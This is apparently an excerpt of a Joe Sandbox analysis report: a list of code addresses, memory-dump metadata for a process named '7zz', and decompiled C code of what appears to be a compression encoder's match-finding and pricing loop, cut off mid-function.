0x00462095
0x00462099
0x0046209c
0x00000000
0x00000000
0x004620a2
0x004620a7
0x00000000
0x004620ad
0x004620b6
0x004620b8
0x004620cd
0x004620d9
0x004620e7
0x004620ea
0x004620ec
0x004620f1
0x004620f3
0x004620f3
0x004620f6
0x004620f8
0x004620f8
0x00462105
0x00462121
0x00462132
0x0046213c
0x00462142
0x00462149
0x00462158
0x00462169
0x0046214b
0x00462151
0x00462151
0x0046217b
0x0046217b
0x004626b8
0x004626b8
0x004626bc
0x004626c2
0x004626c8
0x004626cc
0x004626ce
0x00462060
0x00462060
0x00000000
0x00462060
0x004626d4
0x004626da
0x004626dc
0x004626e6
0x004626ea
0x004626ea
0x004626ef
0x004626f6
0x004626fa
0x004626fa
0x004626f6
0x00462702
0x00462705
0x00462707
0x00462709
0x00462768
0x00462768
0x00000000
0x00462768
0x0046270f
0x00462713
0x00462718
0x0046271f
0x00462723
0x00000000
0x00000000
0x00462731
0x00462738
0x00462744
0x0046274a
0x0046274f
0x00462754
0x00462756
0x00000000
0x00000000
0x00462758
0x00000000
0x0046275e
0x0046275e
0x00462762
0x00000000
0x00000000
0x00000000
0x00000000
0x00462762
0x0046279c
0x004627a6
0x004627a6
0x004627a6
0x004627ac
0x004627bf
0x00000000
0x004627bf
0x00462791
0x00462796
0x00000000
0x00000000
0x00000000
0x00462186
0x0046218c
0x00462197
0x0046219e
0x004621a6
0x004621a9
0x004621af
0x004621bf
0x004621c5
0x004621c8
0x004621ce
0x004621d3
0x004621d5
0x004621d5
0x004621de
0x004621e4
0x004621e4
0x004621e9
0x004621ee
0x004621f4
0x004624d6
0x004624f1
0x00462503
0x00462506
0x0046250c
0x00462511
0x00462513
0x00462513
0x0046251c
0x00462522
0x00462522
0x0046253a
0x00462540
0x00462555
0x0046255f
0x00462564
0x00462569
0x0046256b
0x0046256b
0x0046256b
0x00462572
0x00462576
0x00462598
0x004625a7
0x004625a7
0x00462572
0x004625b2
0x004625b5
0x004625b9
0x004625be
0x004625d9
0x004625dc
0x004625dc
0x004625e6
0x004625c0
0x004625c0
0x004625c0
0x004625e9
0x004625ed
0x004625f0
0x004625f7
0x004625f2
0x004625f2
0x004625f2
0x004625fc
0x00462607
0x00462609
0x00462610
0x00462615
0x00462618
0x00462627
0x0046262d
0x0046262f
0x00462631
0x00462634
0x0046265e
0x00462679
0x0046267e
0x0046267e
0x0046267e
0x00462636
0x00462647
0x00462647
0x00462634
0x00462696
0x00462696
0x00462696
0x0046269c
0x004626a6
0x004626ac
0x004626b2
0x004621fa
0x004621fa
0x00462209
0x00462214
0x00462217
0x0046221d
0x0046222d
0x00462233
0x00462236
0x0046223c
0x00462241
0x00462243
0x00462243
0x0046224c
0x00462252
0x00462252
0x00462257
0x0046225b
0x0046225d
0x004622f8
0x004622ff
0x00462302
0x00462306
0x00462311
0x00462314
0x0046231a
0x0046232a
0x00462330
0x00462333
0x00462339
0x0046233e
0x00462340
0x00462340
0x00462349
0x0046234f
0x0046234f
0x00462354
0x00462359
0x004623c1
0x004623c7
0x004623ce
0x004623d6
0x004623d9
0x004623df
0x004623ef
0x004623f5
0x004623f8
0x004623fe
0x00462403
0x00462405
0x00462405
0x0046240e
0x00462414
0x00462414
0x00462434
0x00462439
0x0046243e
0x00462446
0x00462446
0x00462452
0x00462456
0x0046235b
0x0046235b
0x00462361
0x0046237c
0x0046238e
0x00462391
0x00462397
0x0046239c
0x004623ab
0x004623b1
0x004623b1
0x0046239c
0x00462466
0x0046246c
0x00462263
0x00462263
0x00462269
0x00462284
0x00462296
0x00462299
0x0046229f
0x004622a4
0x004622a6
0x004622a6
0x004622af
0x004622b5
0x004622b5
0x004622c2
0x004622dd
0x004622e2
0x004622e2
0x00462472
0x00462477
0x00462497
0x004624b1
0x004624b9
0x004624cb
0x00462479
0x00462486
0x00462486
0x00462477
0x00000000
0x004621f4
0x00461f8c
0x00461f92
0x00461f94
0x00461f96
0x00461fb0
0x00461fc1
0x00461fc4
0x00461fcc
0x00461fdf
0x00461fed
0x00461ff0
0x00461ff2
0x00461ff7
0x00461ff9
0x00461ff9
0x00461ffc
0x00461ffe
0x00461ffe
0x00462019
0x00462032
0x00462037
0x0046203d
0x0046203d
0x0046203e
0x00000000
0x00461f98
0x00461fa6
0x00461fa6
0x00461f96
0x00461f5d
0x00461f5d
0x00461f6b
0x00461f6b
0x00461f5b
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4105cb9875b833a4641f56c3298e018c9a015dc758ede18aa80ab4fa4bcddc2
Instruction ID: 111ae33a3b18cc3aeac857ece66931766c3972f92f30f96c0da3dc925ecae691
Opcode Fuzzy Hash: d4105cb9875b833a4641f56c3298e018c9a015dc758ede18aa80ab4fa4bcddc2
Instruction Fuzzy Hash: D532C0716142898FCB36CF29CD916DD37AAFFA8308F10452AED498B394EF349A45CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00460DF8 Relevance: .5, Instructions: 487
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00460DF8() {
				signed int _t647;
				signed int _t650;
				void* _t659;
				signed int _t662;
				signed int _t663;
				unsigned int _t672;
				signed int _t673;
				intOrPtr _t678;
				signed int _t681;
				signed int _t683;
				void* _t686;
				signed int _t688;
				signed int _t689;
				void* _t694;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t702;
				signed int _t704;
				void* _t706;
				signed int _t711;
				intOrPtr _t719;
				signed int _t725;
				signed int _t727;
				void* _t728;
				signed int _t733;
				void* _t734;
				intOrPtr _t735;
				signed int _t737;
				void* _t740;
				signed int _t746;
				intOrPtr _t754;
				signed int _t760;
				signed int _t762;
				void* _t765;
				intOrPtr* _t766;
				signed int _t767;
				signed int _t769;
				intOrPtr _t773;
				intOrPtr* _t775;
				signed int _t780;
				void* _t784;
				signed int _t791;
				void* _t792;
				signed int _t793;
				signed int _t795;
				signed int _t799;
				signed int _t801;
				signed int _t802;
				signed int _t804;
				signed int _t810;
				void* _t811;
				signed int _t815;
				void* _t822;
				signed int _t828;
				signed int _t829;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				intOrPtr* _t854;
				signed int _t858;
				signed int _t874;
				void* _t882;
				signed int _t896;
				signed int _t898;
				signed int _t902;
				intOrPtr* _t903;
				signed int _t908;
				void* _t910;
				signed int _t913;
				signed int* _t917;
				signed int _t919;
				intOrPtr _t920;
				signed int _t935;
				signed int _t939;
				intOrPtr* _t940;
				intOrPtr* _t943;
				void* _t944;
				void* _t945;
				signed int _t948;
				signed int _t952;
				intOrPtr* _t953;
				signed int _t966;
				signed int _t970;
				signed int _t971;
				void* _t972;
				signed int _t977;
				signed int _t982;
				signed int _t986;
				signed int _t988;
				void* _t992;
				signed int _t993;
				signed int _t995;
				signed int _t1012;
				void* _t1018;
				signed int _t1019;
				intOrPtr _t1023;
				signed int _t1024;
				signed int _t1027;
				intOrPtr _t1029;
				signed int _t1030;
				signed int _t1037;
				signed int _t1041;
				void* _t1047;
				void* _t1061;
				intOrPtr _t1064;
				intOrPtr _t1071;
				intOrPtr* _t1072;
				void* _t1077;
				intOrPtr _t1079;
				signed int _t1080;
				signed int _t1087;
				signed int _t1096;
				intOrPtr* _t1099;
				signed int _t1101;
				signed int _t1106;
				void* _t1108;
				signed int _t1118;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int _t1128;
				intOrPtr _t1129;
				signed int _t1131;
				signed int _t1136;
				void* _t1137;
				intOrPtr* _t1140;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1148;
				void* _t1151;
				void* _t1153;

				while(1) {
					L58:
					_t854 =  *((intOrPtr*)(_t1153 + 0x20));
					_t686 = _t854 -  *((intOrPtr*)(_t1153 + 0x5c +  *(_t1153 + 0x80) * 4)) - 1;
					 *(_t1153 + 0x28) = _t686;
					if( *_t854 !=  *_t686) {
						goto L86;
					}
					L59:
					_t1023 =  *((intOrPtr*)(_t1153 + 0x20));
					_t910 =  *(_t1153 + 0x28);
					if( *((intOrPtr*)(_t1023 + 1)) !=  *((intOrPtr*)(_t910 + 1))) {
						goto L86;
					}
					_t1141 =  *(_t1153 + 0x24);
					_t1087 = 2;
					if(_t1141 <= 2) {
						L64:
						_t1024 =  *(_t1153 + 0x18);
						_t801 = _t1087 +  *(_t1153 + 0x14);
						if(_t1024 >= _t801) {
							L67:
							_t1142 = _t1087;
							_t733 = E00460150( *(_t1153 + 0x80), _t1151,  *((intOrPtr*)(_t1153 + 0x20)),  *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x48));
							_t913 =  *(_t1153 + 0x30) * 0x110;
							 *(_t1153 + 0x4c) = _t913;
							_t1027 = _t1151 + 0x37858 + (_t913 + _t1087) * 4;
							 *(_t1153 + 0x50) = _t733;
							 *(_t1153 + 0x2c) = _t1027;
							_t917 = _t1151 + 0x6bc + (_t801 + _t801 * 2 + _t801 + _t801 * 2) * 8;
							_t802 = _t1027;
							do {
								_t1029 =  *_t802 + _t733;
								if(_t1029 <  *((intOrPtr*)(_t917 - 0x1c))) {
									 *((intOrPtr*)(_t917 - 0x1c)) = _t1029;
									 *(_t917 - 4) =  *(_t1153 + 0x14);
									 *_t917 =  *(_t1153 + 0x80);
									 *(_t917 - 0x14) = 0;
								}
								_t1087 = _t1087 - 1;
								_t802 = _t802 - 4;
								_t917 = _t917 - 0x30;
							} while (_t1087 >= 2);
							if( *(_t1153 + 0x80) == 0) {
								_t315 = 1 + _t1142; // 0x4
								 *(_t1153 + 0x40) = _t315;
							}
							_t1030 =  *(_t1153 + 0x34);
							_t319 = 1 + _t1142; // 0x4
							_t734 = _t319;
							_t919 =  *(_t1151 + 0x31934) + _t734;
							 *(_t1153 + 0x2c) = _t919;
							if(_t919 > _t1030) {
								_t919 = _t1030;
								 *(_t1153 + 0x2c) = _t1030;
							}
							_t920 =  *((intOrPtr*)(_t1153 + 0x20));
							if(_t734 >= _t919) {
								L79:
								_t735 = _t734 + (_t1030 | 0xffffffff) - _t1142;
								 *((intOrPtr*)(_t1153 + 0x3c)) = _t735;
								if(_t735 < 2) {
									goto L86;
								}
								_t737 =  *(_t1153 + 0x84) + _t1142;
								 *(_t1153 + 0x2c) = _t737;
								 *(_t1153 + 0x44) = _t737 &  *(_t1151 + 0x325a4);
								_t740 = E0045FBE0( *( *(_t1153 + 0x28) + _t1142) & 0x000000ff,  *(_t1142 + _t920) & 0x000000ff, _t1151 + 0x30ea0, ((( *(_t1142 + _t920 - 1) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + ( *(_t1153 + 0x44) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac)));
								_t1037 =  *(0x47c63c +  *(_t1153 + 0x1c) * 4);
								_t804 =  *(_t1151 + 0x325a8);
								_t1096 =  *(0x47c5dc + _t1037 * 4);
								_t360 = 1 +  *(_t1153 + 0x84); // 0x4
								_t935 = _t1142 + _t360 & _t804;
								_t1041 = (_t1096 << 4) + _t935;
								 *(_t1153 + 0x44) = _t1041;
								 *(_t1153 + 0x50) = ( *(_t1151 + 0x325b0 + _t1041 * 2) & 0x0000ffff ^ 0x000007f0) >> 4;
								_t1047 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t1096 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 +  *(_t1153 + 0x50) * 4)) + _t740 +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + (( *(_t1153 + 0x2c) & _t804) + (_t1037 << 4)) * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + ( *(_t1153 + 0x4c) + _t1142) * 4)) +  *(_t1153 + 0x50);
								_t810 =  *((intOrPtr*)(_t1153 + 0x3c)) + _t1142 + 1 +  *(_t1153 + 0x14);
								_t746 =  *(_t1153 + 0x18);
								 *(_t1153 + 0x4c) = _t810;
								if(_t746 >= _t810) {
									L84:
									_t939 = _t810 + _t810 * 2 + _t810 + _t810 * 2;
									_t754 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 +  *(_t1153 + 0x44) * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t1096 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t935 * 0x110 +  *((intOrPtr*)(_t1153 + 0x3c))) * 4)) + _t1047;
									_t940 = _t1151 + 0x6a0 + _t939 * 8;
									if(_t754 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t939 * 8))) {
										 *_t940 = _t754;
										_t420 = 1 +  *(_t1153 + 0x14); // 0x4
										 *((intOrPtr*)(_t940 + 0x18)) = _t1142 + _t420;
										 *(_t940 + 0x10) =  *(_t1153 + 0x14);
										 *(_t940 + 0x1c) = 0;
										 *(_t940 + 8) = 1;
										 *(_t940 + 0xc) = 1;
										 *(_t940 + 0x14) =  *(_t1153 + 0x80);
									}
									goto L86;
								}
								 *(_t1153 + 0x50) = _t1151 + 0x6a0 + (_t746 + _t746 * 2 + _t746 + _t746 * 2) * 8;
								_t760 =  *(_t1153 + 0x18);
								_t811 = _t810 - _t760;
								 *(_t1153 + 0x18) = _t760 + _t811;
								_t762 =  *(_t1153 + 0x50);
								do {
									_t762 = _t762 + 0x30;
									_t811 = _t811 - 1;
									 *_t762 = 0x40000000;
								} while (_t811 != 0);
								_t810 =  *(_t1153 + 0x4c);
								goto L84;
							} else {
								_t1099 = _t734 + _t920;
								_t1030 =  *(_t1153 + 0x28) - _t920;
								while( *_t1099 ==  *((intOrPtr*)(_t1099 + _t1030))) {
									_t734 = _t734 + 1;
									_t1099 = _t1099 + 1;
									if(_t734 <  *(_t1153 + 0x2c)) {
										continue;
									}
									goto L79;
								}
								goto L79;
							}
						}
						_t765 = _t801 - _t1024;
						_t943 = _t1151 + 0x6a0 + (_t1024 + _t1024 * 2 + _t1024 + _t1024 * 2) * 8;
						 *(_t1153 + 0x18) = _t1024 + _t765;
						do {
							_t943 = _t943 + 0x30;
							_t765 = _t765 - 1;
							 *_t943 = 0x40000000;
						} while (_t765 != 0);
						goto L67;
					}
					_t766 = _t1023 + 2;
					_t944 = _t910 - _t1023;
					while( *_t766 ==  *((intOrPtr*)(_t944 + _t766))) {
						_t1087 = 1 + _t1087;
						_t766 = _t766 + 1;
						if(_t1087 < _t1141) {
							continue;
						}
						goto L64;
					}
					goto L64;
					L86:
					_t688 = 1 +  *(_t1153 + 0x80);
					 *(_t1153 + 0x80) = _t688;
					if(_t688 < 4) {
						do {
							L58:
							_t854 =  *((intOrPtr*)(_t1153 + 0x20));
							_t686 = _t854 -  *((intOrPtr*)(_t1153 + 0x5c +  *(_t1153 + 0x80) * 4)) - 1;
							 *(_t1153 + 0x28) = _t686;
							if( *_t854 !=  *_t686) {
								goto L86;
							}
							goto L59;
						} while (_t688 < 4);
					}
					_t1122 =  *(_t1153 + 0x54);
					_t689 =  *(_t1153 + 0x24);
					if(_t1122 <= _t689) {
						L91:
						_t988 =  *(_t1153 + 0x40);
						if(_t1122 < _t988) {
							while(1) {
								L127:
								_t683 = 1 +  *(_t1153 + 0x14);
								 *(_t1153 + 0x14) = _t683;
								if(_t683 ==  *(_t1153 + 0x18)) {
									break;
								}
								_t647 = E004600C0(_t1151, _t1153 + 0x38);
								 *(_t1153 + 0x54) = _t647;
								if(_t647 >=  *(_t1151 + 0x31934)) {
									 *((intOrPtr*)(_t1151 + 0x698)) =  *((intOrPtr*)(_t1153 + 0x38));
									 *(_t1151 + 0x694) = _t647;
									L130:
									return E00460210( *(_t1153 + 0x14), _t1151,  *((intOrPtr*)(_t1153 + 0x88)));
								} else {
									_t1118 =  *(_t1153 + 0x14);
									 *(_t1153 + 0x84) = 1 +  *(_t1153 + 0x84);
									_t791 = _t1118 + _t1118 * 2 << 4;
									_t1071 =  *((intOrPtr*)(_t791 + _t1151 + 0x6a8));
									_t650 =  *(_t791 + _t1151 + 0x6b8);
									_t792 = _t791 + _t1151;
									if(_t1071 == 0) {
										_t970 =  *(_t1151 + 0x6a4 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8);
									} else {
										_t650 = _t650 - 1;
										if( *((intOrPtr*)(_t792 + 0x6ac)) == 0) {
											_t970 =  *(0x47c5dc +  *(_t1151 + 0x6a4 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8) * 4);
										} else {
											_t966 =  *(_t1151 + 0x6a4 + ( *(_t792 + 0x6b0) +  *(_t792 + 0x6b0) * 2 +  *(_t792 + 0x6b0) +  *(_t792 + 0x6b0) * 2) * 8);
											if( *(_t792 + 0x6b4) >= 4) {
												_t970 =  *(0x47c5dc +  *(0x47c60c + _t966 * 4) * 4);
											} else {
												_t970 =  *(0x47c5dc +  *(0x47c63c + _t966 * 4) * 4);
											}
										}
									}
									if(_t650 != _t1118 - 1) {
										if(_t1071 == 0 ||  *((intOrPtr*)(_t792 + 0x6ac)) == 0) {
											_t828 =  *(_t792 + 0x6bc);
											 *(_t1153 + 0x80) = _t828;
											if(_t828 >= 4) {
												_t971 =  *(0x47c60c + _t970 * 4);
												_t829 =  *(_t1153 + 0x80);
												goto L19;
											}
											 *(_t1153 + 0x1c) =  *(0x47c63c + _t970 * 4);
											_t829 =  *(_t1153 + 0x80);
											goto L20;
										} else {
											_t829 =  *(_t792 + 0x6b4);
											_t650 =  *(_t792 + 0x6b0);
											_t971 =  *(0x47c63c + _t970 * 4);
											 *(_t1153 + 0x80) = _t829;
											L19:
											 *(_t1153 + 0x1c) = _t971;
											L20:
											_t972 = _t1151 + 0x6a0 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8;
											if(_t829 >= 4) {
												 *((intOrPtr*)(_t1153 + 0x5c)) = _t829 + 0xfffffffc;
												 *(_t1153 + 0x60) =  *(_t972 + 0x20);
												 *((intOrPtr*)(_t1153 + 0x64)) =  *((intOrPtr*)(_t972 + 0x24));
												 *((intOrPtr*)(_t1153 + 0x68)) =  *((intOrPtr*)(_t972 + 0x28));
												goto L25;
											}
											 *((intOrPtr*)(_t1153 + 0x5c)) =  *((intOrPtr*)(_t972 + 0x20 + _t829 * 4));
											_t784 = 1;
											if(_t829 < 1) {
												L23:
												memcpy(_t1153 + 0x5c + _t784 * 4, _t972 + 0x20 + _t784 * 4, 4 << 2);
												_t1153 = _t1153 + 0xc;
												goto L25;
											}
											_t784 = memcpy(_t1153 + 0x60, _t972 + 0x20, _t829 << 2);
											_t1153 = _t1153 + 0xc;
											if(1 >= 4) {
												goto L25;
											}
											goto L23;
										}
									} else {
										if( *(_t792 + 0x6bc) != 0) {
											 *(_t1153 + 0x1c) =  *(0x47c5dc + _t970 * 4);
										} else {
											 *(_t1153 + 0x1c) =  *(0x47c66c + _t970 * 4);
										}
										L25:
										_t1120 =  *(_t1153 + 0x1c);
										 *((intOrPtr*)(_t792 + 0x6c0)) =  *((intOrPtr*)(_t1153 + 0x5c));
										 *(_t792 + 0x6c4) =  *(_t1153 + 0x60);
										 *(_t792 + 0x6a4) = _t1120;
										 *((intOrPtr*)(_t792 + 0x6c8)) =  *((intOrPtr*)(_t1153 + 0x64));
										 *((intOrPtr*)(_t792 + 0x6cc)) =  *((intOrPtr*)(_t1153 + 0x68));
										 *(_t1153 + 0x24) =  *(_t792 + 0x6a0);
										 *(_t1153 + 0x28) = 0;
										_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t1151 + 0xc))))() - 1; // -1
										_t1072 = _t106;
										 *(_t1153 + 0x80) =  *_t1072;
										_t659 = _t1072 -  *((intOrPtr*)(_t1153 + 0x5c));
										 *((intOrPtr*)(_t1153 + 0x3c)) = _t659 - 1;
										 *(_t1153 + 0x13) =  *((intOrPtr*)(_t659 - 1));
										_t977 =  *(_t1153 + 0x84);
										_t662 = _t977 &  *(_t1151 + 0x325a8);
										 *(_t1153 + 0x30) = _t662;
										_t663 = _t662 + (_t1120 << 4);
										 *(_t1153 + 0x40) = _t663;
										 *((intOrPtr*)(_t1153 + 0x20)) = _t1072;
										 *(_t1153 + 0x2c) =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t663 * 2) & 0x0000ffff) >> 4) * 4)) +  *(_t1153 + 0x24);
										 *(_t1153 + 0x44) =  *(_t1151 + 0x325a4) & _t977;
										_t1077 = ((( *(_t1072 - 1) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + ( *(_t1153 + 0x44) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac));
										if(_t1120 < 7) {
											 *(_t1153 + 0x34) = 0;
											_t672 =  *(_t1153 + 0x80) & 0x000000ff | 0x00000100;
											do {
												_t851 =  *(_t1153 + 0x34) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1077 + (_t672 >> 8) * 2) & 0x0000ffff) >> 0x00000004 ^  ~(_t672 >> 0x00000007 & 0x00000001) >> 0x00000004 & 0x0000007f) * 4));
												_t672 = _t672 + _t672;
												 *(_t1153 + 0x34) = _t851;
											} while (_t672 < 0x10000);
											_t673 = _t851;
											L30:
											_t982 =  *(_t1153 + 0x2c) + _t673;
											 *(_t1153 + 0x2c) = _t982;
											if(_t982 <  *(_t792 + 0x6d0)) {
												 *(_t792 + 0x6d0) = _t982;
												 *(_t792 + 0x6e8) =  *(_t1153 + 0x14);
												 *((intOrPtr*)(_t792 + 0x6ec)) = 0xffffffff;
												 *(_t792 + 0x6d8) = 0;
												 *(_t1153 + 0x28) = 1;
											}
											_t852 =  *(_t1153 + 0x40);
											_t678 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t852 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *(_t1153 + 0x24);
											_t986 =  *(_t1153 + 0x14);
											_t1079 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t1120 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) + _t678;
											 *((intOrPtr*)(_t1153 + 0x58)) = _t678;
											 *((intOrPtr*)(_t1153 + 0x48)) = _t1079;
											if( *(_t1153 + 0x13) ==  *(_t1153 + 0x80) && ( *(_t792 + 0x6e8) >= _t986 ||  *((intOrPtr*)(_t792 + 0x6ec)) != 0)) {
												_t780 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t1120 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 + _t852 * 2) & 0x0000ffff) >> 4) * 4)) + _t1079;
												if(_t780 <=  *(_t792 + 0x6d0)) {
													 *(_t792 + 0x6d0) = _t780;
													 *(_t792 + 0x6e8) = _t986;
													 *((intOrPtr*)(_t792 + 0x6ec)) = 0;
													 *(_t792 + 0x6d8) = 0;
													 *(_t1153 + 0x28) = 1;
												}
											}
											_t853 =  *(_t1151 + 0x69c);
											_t681 = 0xfff - _t986;
											 *(_t1153 + 0x34) = _t853;
											if(0xfff < _t853) {
												_t853 = 0xfff;
												 *(_t1153 + 0x34) = _t681;
											}
											if(_t853 < 2) {
												continue;
											} else {
												_t1121 =  *(_t1151 + 0x31934);
												 *(_t1153 + 0x24) = _t853;
												if(_t853 > _t1121) {
													 *(_t1153 + 0x24) = _t1121;
												}
												if( *(_t1153 + 0x28) != 0 ||  *(_t1153 + 0x13) ==  *(_t1153 + 0x80)) {
													L57:
													 *(_t1153 + 0x40) = 2;
													 *(_t1153 + 0x80) = 0;
													goto L58;
												} else {
													_t1143 = 1 + _t1121;
													if(_t1143 > _t853) {
														_t1143 = _t853;
													}
													_t945 = 1;
													if(_t1143 <= 1) {
														L50:
														_t204 = _t945 - 1; // 0x1
														_t767 = _t204;
														 *(_t1153 + 0x80) = _t767;
														if(_t767 < 2) {
															goto L57;
														}
														_t769 =  *(0x47c5dc +  *(_t1153 + 0x1c) * 4);
														_t948 = 0x00000001 +  *(_t1153 + 0x84) &  *(_t1151 + 0x325a8);
														_t815 = (_t769 << 4) + _t948;
														_t1061 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t815 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t769 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *(_t1153 + 0x2c);
														_t1148 =  *(_t1153 + 0x80) + 1 +  *(_t1153 + 0x14);
														_t1101 =  *(_t1153 + 0x18);
														 *(_t1153 + 0x40) = _t815;
														if(_t1101 >= _t1148) {
															L55:
															_t952 = _t1148 + _t1148 * 2 + _t1148 + _t1148 * 2;
															_t773 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 + _t815 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t769 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t948 * 0x110 +  *(_t1153 + 0x80)) * 4)) + _t1061;
															_t953 = _t1151 + 0x6a0 + _t952 * 8;
															if(_t773 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t952 * 8))) {
																 *_t953 = _t773;
																 *((intOrPtr*)(_t953 + 0x18)) = 1 +  *(_t1153 + 0x14);
																 *((intOrPtr*)(_t953 + 0x1c)) = 0;
																 *(_t953 + 8) = 1;
																 *((intOrPtr*)(_t953 + 0xc)) = 0;
															}
															goto L57;
														}
														 *(_t1153 + 0x44) = _t1151 + 0x6a0 + (_t1101 + _t1101 * 2 + _t1101 + _t1101 * 2) * 8;
														_t822 = _t1148 - _t1101;
														 *(_t1153 + 0x18) = _t1101 + _t822;
														_t1106 =  *(_t1153 + 0x44);
														do {
															_t1106 = _t1106 + 0x30;
															_t822 = _t822 - 1;
															 *_t1106 = 0x40000000;
														} while (_t822 != 0);
														_t815 =  *(_t1153 + 0x40);
														goto L55;
													} else {
														_t1064 =  *((intOrPtr*)(_t1153 + 0x20));
														_t775 = _t1064 + 1;
														_t1108 =  *((intOrPtr*)(_t1153 + 0x3c)) - _t1064;
														while( *_t775 ==  *((intOrPtr*)(_t1108 + _t775))) {
															_t945 = _t945 + 1;
															_t775 = _t775 + 1;
															if(_t945 < _t1143) {
																continue;
															}
															goto L50;
														}
														goto L50;
													}
												}
											}
										}
										_t673 = E0045FBE0( *(_t1153 + 0x13) & 0x000000ff,  *(_t1153 + 0x80) & 0x000000ff, _t1151 + 0x30ea0, _t1077);
										goto L30;
									}
								}
							}
							goto L130;
						}
						 *((intOrPtr*)(_t1153 + 0x58)) =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 +  *(_t1153 + 0x1c) * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1153 + 0x58));
						_t694 = _t1122 +  *(_t1153 + 0x14);
						_t858 =  *(_t1153 + 0x18);
						if(_t858 >= _t694) {
							L95:
							_t695 = 0;
							 *(_t1153 + 0x80) = 0;
							if(_t988 <=  *((intOrPtr*)(_t1151 + 0x310a0))) {
								L99:
								_t697 =  *(_t1151 + 0x310a4 +  *(_t1153 + 0x80) * 4);
								_t1080 = 1 + _t988;
								 *(_t1153 + 0x2c) = _t697;
								 *(_t1153 + 0x28) = ( *((_t697 >> ( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) + _t1151 + 0x306a0) & 0x000000ff) + (( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) * 2;
								 *(_t1153 + 0x30) = _t1151 + 0x33010 + ( *(_t1153 + 0x30) * 0x110 + _t988) * 4;
								_t793 = _t1151 + 0x6bc + ( *(_t1153 + 0x14) + _t988 + ( *(_t1153 + 0x14) + _t988) * 2 +  *(_t1153 + 0x14) + _t988 + ( *(_t1153 + 0x14) + _t988) * 2) * 8;
								while(1) {
									_t992 =  *( *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x58));
									 *(_t1153 + 0x24) = _t793;
									 *(_t1153 + 0x44) = _t1080;
									_t874 = _t1080 - 3;
									if(_t1080 - 1 >= 5) {
										_t874 = 3;
									}
									if(_t697 >= 0x80) {
